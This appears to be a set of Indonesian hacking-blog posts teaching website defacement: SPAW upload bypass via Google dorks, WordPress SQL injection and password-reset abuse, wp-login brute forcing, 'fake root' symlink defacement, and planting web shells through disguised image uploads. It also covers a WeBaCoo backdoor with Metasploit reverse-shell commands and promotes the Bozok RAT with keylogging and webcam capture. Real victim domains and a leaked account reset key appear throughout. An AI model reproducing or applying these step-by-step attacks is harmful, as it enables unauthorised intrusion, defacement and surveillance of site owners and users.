Cara Deface Website Melalui Spaw Uploads Vulnerability Axveez rwxr-xr-x 0 05:10

Filename	Cara Deface Website Melalui Spaw Uploads Vulnerability
Permission	rw-r--r--
Author	Axveez
Date and Time	05:10
Label
Action

). Pertama, Masukan Dorknya :

inurl:”spaw2/uploads/files/”

Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p

Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. Jadi hasilnya begini :

inurl:”spaw2/uploads/files/” site:th

Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.my, site:jp, site:gov.cn etc asal jangansite:co.id yah !

2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :

http://contoh.com/spaw2/uploads/files/

3). Ganti pada Bagian /spaw2/uploads/files/ dengan kode dibawah ini :

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Sehingga Menjadi Seperti Ini :

http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

4). Tekan Enter, Nanti akan Terbuka Seperti Ini :

5). Selanjutnya Liat Terus Gambar, Karena Tutorial ada Didalam Gambar.

6). Next, Pilih File Deface'an Sobat, Lalu klik Open dan Tunggu Hingga Loading Selesai.

7). Selanjutnya Klik Tombol Upload.

8). Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.

9). Selesai, dan Hasilnya :

http://hacker.website.org/

Mungkin orang mengira saya gila tutor, segampang ini harus diperjelas seperti ini. Tapi inilah saya, sosok yang tidak sempurna dan masih banyak kekurangan. Saya hanya ingin memperjelas kepada sobat semua agar sobat bisa mengerti dengan jelas.

Karena dari pengalaman saya dulu saat menjadi newbie ( Sekarang pun Masih Newbie ) susah sekali mencari tutor yang sangat mudah untuk dimengerti, cari sana-sini tapi hasil tetap 0.

Maka tujuan saya menulis tutorial ini biar sobat-sobat semua yang masih pemula ( Bukan saya sok, saya juga masih belajar ) dan masih belajar bisa mengerti.

Sekian Postingan saya kali ini tentang Cara Deface Website Melalui Spaw Uploads Vulnerability, semoga dapat bermanfaat bagi sobat semua.

Tutorial Hack Wordpress dengan Sql injection with Havij Axveez rwxr-xr-x 0 02:24

Filename	Tutorial Hack Wordpress dengan Sql injection with Havij
Permission	rw-r--r--
Author	Axveez
Date and Time	02:24
Label
Action

Hack WordPress (SQL Injection + Reset Password) merupakan salah satu cara yang dapat kita gunakan untuk mendeface Blog WordPress. Okeh karena caranya disini lumayan panjang jadi gak usah basa-basi dulu deh langsung aja kita mulai
Pertama kita siapin dulu bahan-bahan yang dibutuhkan demi lancarnya aksi kita kali ini, hehe..

1. Kompie terhubung internet
2. Havij (maklum lammer jadi masih pake tool, yang dewa manual aja yah)
3. dork: inurl:?fbconnect_action=myhome ( kreasi lagi yaa )

1. Kesabaran dalam mencari target
2. Kopi dan musik yang kuenceng ( disarankan alirannya Rock,Metal ) hehehe

saya beri contoh satu korban yaitu http://www.40sale.com/?fbconnect_action=myhome&userid=14 pada bagian “userid=” di tambahin tulisan ” fb” jadi bentuknya seperti ini http://www.40sale.com/?fbconnect_action=myhome&fbuserid=14

kalau udah scan dengan Havij dan cari tabel wp_user atau yang berhubungan dengan user lah,kalau udah ketemu caricolumn user_login dan user_activation_key

heheh…dah ketemu tuh yang kita cari,

username:pico

Activation key: GBasuGIZFtbUjpP3MvWb

sekarang kita gunakan exploitnya yaitu

wp-login.php?action=rp&key=“kode aktivasi”&login=“user login”

jadi alamatnya tadi dirubah seperti ini http://www.40sale.com/wp-login.php?action=rp&key=GBasuGIZFtbUjpP3MvWb&login=pico

sampailah kita ke tahap me-reset password korban heheh,kalau udah direset kita tinggal login dan melakukan sekehendak kita

saya cukup ngedit home.php nya aja dah,hehehe

buseeeet hasilnya kelam banget dah…sory ya min

Cara Mudah Deface Wordpress Site Dengan WP Bruteforce Axveez rwxr-xr-x 0 01:20

Filename	Cara Mudah Deface Wordpress Site Dengan WP Bruteforce
Permission	rw-r--r--
Author	Axveez
Date and Time	01:20
Label
Action

Salam Sobat,, ;)


Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Pertama Download Bahan-Bahannya:

WPBruteforce


Password: http://indocyberarmy.blogspot.com

Dork: inurl:/wp-login.php

Yup, saatnya kita beraksi.. :)

Live Target: http://live-target.pusku.com/

Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute

Lalu buka comand dengan cara : Klik Start>Run>ketik cmd

Biasanya posisi default directories di Cmd : C:\User\User_Name>

Ubah posisi directori dgn cara: ketik cd.. trus enter!

ex:
C:\User\User_Name>cd..
C:\User>cd..
C:\>

 Lalu  setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter! 

Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!

Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10

Lalu tekan enter!

Tunggu proses hingga selesai!

Wew! Berhasil tuh! wkwkwk Mantap! :p

Langsung Login dah!

GoodLuck!! :D

Artikel Aslinya :http://indocyberarmy.blogspot.com/2013/03/cara-mudah-deface-wordpress-site-dengan.html

Tutorial deface dengan Fake Root Axveez rwxr-xr-x 1 20:15

Filename	Tutorial deface dengan Fake Root
Permission	rw-r--r--
Author	Axveez
Date and Time	20:15
Label
Action

Hallo sobat ... kali ini saya akan share., cara deface menggunakan fake root :)

Oke, disimak yah ^^

Pertama - tama kita harus punya bahan - bahan'a dulu ^^

- Web vuln anda bisa menggunakan teknik Exploit joomla , Exploit Wordpress , Config web vuln

-  Shell 1NJECTION anda bisa mendowload disini  Mirror : Shell Config killer <<Dowload>>

  NB : Shell 1NJ3CTION v3.3 <<Tanpa Login>>

Oke disimak yah :)

Pertama - tama kita harus punya web yang sudah ditanam shell..., 

Kira - kira tampilan akan seperti ini 

Klik 2x tombol menu symlink

contoh gambar dibawah :

Kalo udh akan muncul beberapa menu., Pilihlah menu Domain list

lalu klik 2x

Taraaaaaaaaaaaaaaaaaa., Muncul deh website - website yang 1 server sama web tadi..,

cara mengecek web tadi vuln fake root

copy salah satu url web yang satu server sama web tadi.
tambahkan ~root di belakang url web tadi.,
contoh : ww.site.com/~root/

maka jika hasil'a akan forbidden...., so., web tadi vuln fake root jika tidak berarti tidak vuln

Sooo...

kita tinggal mengetahui root web nya aja

Lihat gambar dibawah:

 cara melihat root webite cukup mudah :)
kalo anda sedang masuk shell "injection ., shell inject akan mempublikasikan semua tentang web tadi
dan folder yang kalian lihat
contoh folder : /home/sixwords/public_html/
jadi ROOT web tadi adalah : sixwords karena root selalu berada di tengah (antara home sama public_html)
kurang jelas ? Lihat gambar dibawah

Jika sudah , mari kita gabungkan (Web yang kita peroleh dari domain list)

Oiya sobat., sobat harus mengupload script sobat  ju'a di web tadi ,

tapi jika sobat mempaste di Index.php juga ga papa kok :)

cara mengakses jika mempaste di index.php :
www.webtadi.com/~rootweb/
cara mengakse jika mengupload script
NB : (Upload di public_html) :
www.webku.com/~rootweb/filemu.html
 Sudah paham kan sobat ?
contoh fake root :
http://artiszin.co.uk/~sixwords/ .
http://ashtonphotography.co.uk/~sixwords/ .
http://asianbusinessforum.com/~sixwords/ .
http://attualegraphics.com/~sixwords/ .
http://attualegraphics.it/~sixwords/ .
http://audienginesandgearboxes.co.uk/~sixwords/ .
http://autoleveller.co.uk/~sixwords/ .
http://automotiveairfilter.co.uk/~sixwords/ .
http://avesta.ltd.uk/~sixwords/ .
http://axisoflight.co.uk/~sixwords/ .
http://aylesburychoral.org.uk/~sixwords/ .
http://aylesburydeanery.org/~sixwords/ .
http://babtek.com/~sixwords/ .
http://badcreditloansforunemployed.org.uk/~sixwords/ .
http://badcreditpaydayloans.org.uk/~sixwords/ .
http://badcredittenantloans.org.uk/~sixwords/ .
http://bandaoke.co.uk/~sixwords/ .
http://bayleavesrestaurant.co.uk/~sixwords/ .
http://bdwebdesign.co.uk/~sixwords/ .
http://becomeacounselor.co.uk/~sixwords/ .
http://bernwodebenefice.com/~sixwords/ .
http://bespoke-education.com/~sixwords/ .
http://bestgaminglaptop.co.uk/~sixwords/ .
http://bestguarantorloansuk.co.uk/~sixwords/ .
http://bestiphone4sdeals.co.uk/~sixwords/ .
http://bestmotorhomes.co.uk/~sixwords/ .
http://bestnlessaccountants.co.uk/~sixwords/ .
http://bestonlineflashgames.net/~sixwords/ .
http://bestpersonalinjurylawyernyc.com/~sixwords/ .
http://bicestersweepers.co.uk/~sixwords/ .
dan masih banyak lagi :)

Cara menanam Shell Lewat Upload Image di Cms Korban Axveez rwxr-xr-x 0 02:56

Filename	Cara menanam Shell Lewat Upload Image di Cms Korban
Permission	rw-r--r--
Author	Axveez
Date and Time	02:56
Label
Action

ane bakal Kasih tutor cara tanam shell a.k.a Backdoor a.k.a PintuBelakang a.k.a Lawang dapo di website yang sudah berhasil di dapatkan username and password adminnya....

Simak baik-baik dan jangan ada yang terlewat

Bahan
1. Browser Mozilla
2. Add on tamper Data
3. shell(saya menggunakan hn-shell)
4. Rokok sampurna(Malrboro Putih juga boleh)
5. Koneksi internet (Pastinya)

Tutor
1. Saya asumsikan anda sudah berhasil masuk ke halaman admin dan sekarang carilah tempat dimana anda bisa upload file seperti gambar di bawah ini

d sini saya mencari tempat upload gambar

2. Kita tinggalkan dulu sebentar browser dan kita lihat shell yang udah d siapkan tadi dan ganti ekstensi nya menjadi .jpeg/.jpg



3. sekarang kita balik lagi ke halaman admin terus klik browse dan pilih shell yang udah d rubah ekstensi tadi trus klik open

4. sekarang buka Add-On Tamper Data Tool>>tamper data dan klik start tamper dan klik Update

5. Setelah itu akan muncul pilihan dan pilih tamper



6. lalu akan muncul seperti gambar di bawah ini dan Copy script yang saya lingkari dan copy ke notepad terus cari nama shell yang agan upload tadi lalu hapus ekstensi .jpeg/.jpeg lalu Copas ke Tempat yang tadi Lalu Klik Ok dan Pilih Abort Request



7. Setelah semuanya selesai cari shell yang sudah anda upload tadi di websitenya lalu Copy link address ny dan buka di tab baru....

8. Selamat anda Sudah berhasil Tanam shell a.k.a Backdoor a.k.a PintuBelakang a.k.a lawang dapo

Membuat Backdoor dengan Webacoo dan Metaesploit Axveez rwxr-xr-x 0 02:47

Filename	Membuat Backdoor dengan Webacoo dan Metaesploit
Permission	rw-r--r--
Author	Axveez
Date and Time	02:47
Label
Action

Dear Sobar Blogger, kali ini mas blaz mau sharing trik nih , yaitu Hack / Deface website menggunakan WeBaCoo, WeBaCoo adalah sebuah tools CLI (Command Line) yg menjadi penghubung http antara Attacker (Penyerang) dengan Web Server yang menjadi target kita, disertai dengan pembuatan Web Backdoor tools yg berbasis Perl ini juga memberikan module agar client dapat mengakses melalui metasploit.

sekarang mari kita lihat kronologinya.

Equipments:
1. WeBacoo
2. Metasploit

pada OS Kali Linux secara default webacoo bisa kita temukan di /usr/share/webacoo/

bagi yg belum ada tools ini silahkan download terlebih dahulu

# git clone https://github.com/anestisb/WeBaCoo.git

untuk lebih jelas nya silahkan lihat gambar ini sob :

selanjutnya kita memindahkan file 'msf_webacoo_module.rb' ke directory /usr/share/metasploit-framework/modules/eksploitasi/multi/http/

agar file tersebut dapat di akses menggunakan metasploit.

# cp /usr/share/webacoo/msf_webacoo_module.rb [b]/usr/share/metasploit-framework/modules/exploits/multi/http/[/b]

untuk lebih jelas lihat gambar :

selanjutnya kita cek apakah module tersebut siap di eksekusi:

# msfconsole -q
msf > search webacoo

terlihat pada gambar diatas, module webacoo siap jalankan dan sekarang tahap pembuatan Backdoor ala WeBacoo

# webacoo -g -o /tmp/webacoo.php

-g = generate backdoor
-o = output filename
/tmp/webacoo.php = saya menyimpannya di directory /tmp/ dengan nama webacoo.php

selanjutnya kita upload ke situs korban,
dan disini backdoor saya terletak di /wp-content/uploads/webacoo.php

selanjutnya kita kembali ke Metasploit untuk mengkoneksikan Client dengan WebServer target :

msf > use exploit/linux/http/msf_webacoo_module
msf exploit(msf_webacoo_module) > show payloads
msf exploit(msf_webacoo_module) > set PAYLOAD cmd/unix/reverse_perl
msf exploit(msf_webacoo_module) > set LHOST XXX.XXX.XXX
msf exploit(msf_webacoo_module) > set LPORT 4444
msf exploit(msf_webacoo_module) > set RHOST XXX.XXX.XXX.XXX or www.TARGET.com
msf exploit(msf_webacoo_module) > set URI /wp-content/uploads/webacoo.php
msf exploit(msf_webacoo_module) > check
msf exploit(msf_webacoo_module) > exploit

PAYLOAD = payload yang saya gunakan
LHOST and LPORT = IP-Address saya dan Port Listen saya
RHOST = Situs Target
URI = Letak dimana backdoor disimpan

terlihat diatas Command Shell 1 telah tebuka.
suksess.... sekarang kita bebas di situs korban
sedikit penjelasan, pada kenyataannya kita bisa langsung terhubung dengan server korban tanpa harus melalui Metasploit menggunakan perintah:

# webacoo -t -u http://www.TARGET.com/Path/Backdoor/backdoor.php

-t = Establish remote "terminal" connection
-u = Url Backdoor

remote administration tools (RAT) Axveez rwxr-xr-x 0 03:53

Filename	remote administration tools (RAT)
Permission	rw-r--r--
Author	Axveez
Date and Time	03:53
Label
Action

Sharing sebuah tools yaitu remote administration tools (RAT) untuk windows, dimana aplikasi ini bisa berjalan di platform XP-Win8. Kemampuan tools Bozok ini cukup lumayan dimana dilengkapi dengan mematikan dan menghidupkan proses, mengatur services, keylogger dan webcam live capture.

Menu-menu dan fungsi-fungsi yang tersedia sebagai berikut:

1. Filemanager:
   • Download/Upload File
   • Rename File
   • Delete File
   • Execute File
     • Hidden
     • Visible
   • Create Folder
   

   Bozok 1.0.1
2. Processmanager
   • Terminate Process
   

   Bozok Screen
3. Windowmanager
   • Close Window
   • Maximize/Minimize
4. Servicemanager
   • Stop Service
   • Pause Service
   • Resume Service
   • Start Service
5. Installation
   • Doesnt fire up UAC
   • Compitable with XP-Windows7 (both architectures)
   • Startup
   • Melt
   • Mutex Check
6. Unicode compatible

Fitur lainnya:

1. Remote Desktop
   • Control mouse/keyboad
2. Keylogger
   • 

     Bozok RAT – BinusHacker
3. Webcam
   • 

     Bozok RAT – BinusHacker

Lebih detail cara penggunaannya bisa dilihat di Video Tutorial Bozok RAT

Download Tools Selengkapnya: